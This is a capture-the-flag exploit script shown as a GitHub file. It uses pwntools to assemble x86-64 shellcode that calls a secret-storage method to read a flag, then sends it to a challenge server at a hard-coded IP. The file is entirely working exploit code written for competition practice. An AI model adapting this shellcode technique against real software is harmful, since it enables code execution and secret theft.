-
Notifications
You must be signed in to change notification settings - Fork 262
/
Copy pathexploit.py
executable file
·62 lines (48 loc) · 2.1 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/usr/bin/python2
from pwn import *
import cipher
def exploit(connection):
ciphertext = 0x8F1FA1AD36C66F95, 0xC96AAC2F35C3833F
key = 0x70697A7A6174716C, 0x6C7174617A7A6970
plaintext = cipher.decrypt(key, ciphertext)
payload = """
/*
* std::string key("YouMadeAFIDLCall");
* std::string value;
* client->SecretStorageGetFlag1(key, &value);
* puts(value.ptr);
* exit(0);
*/
mov rbx, [rsp] /* from call */
sub rbx, 0x7205 /* caidanti image base */
push 0 /* allocate value object */
push 0
push 0
lea rdx, [rsp] /* = &value */
lea rsi, [rip + key] /* = key */
mov rdi, [rbx + 0x12140] /* = client */
mov rax, [rdi]
call [rax + 0x38] /* client->SecretStorageGetFlag1 */
mov rdi, [rsp] /* = value.ptr */
call [rbx + 0x120a8] /* puts */
xor rdi, rdi
call [rbx + 0x12028] /* exit */
.balign 0x10
key:
.quad {plaintext[0]}, {plaintext[1]}
.fill 7, 1, 0
.byte 0x10
"""
payload_binary = asm(payload.format(plaintext=plaintext))
# application command to execute arbitrary shellcode
connection.recvuntil("114514. Bring your own C\xc3\xa0i D\xc4\x81n T\xc3\xad\n")
connection.send("114514\n")
connection.recvuntil("Your code size: ")
connection.send("{:d}\n".format(len(payload_binary)))
connection.send(payload_binary)
flag = connection.recvuntil("}")
info("flag = \"{:s}\"".format(flag))
context.log_level = "debug"
context.arch = "amd64"
with remote("54.177.17.135", 23333) as connection:
exploit(connection)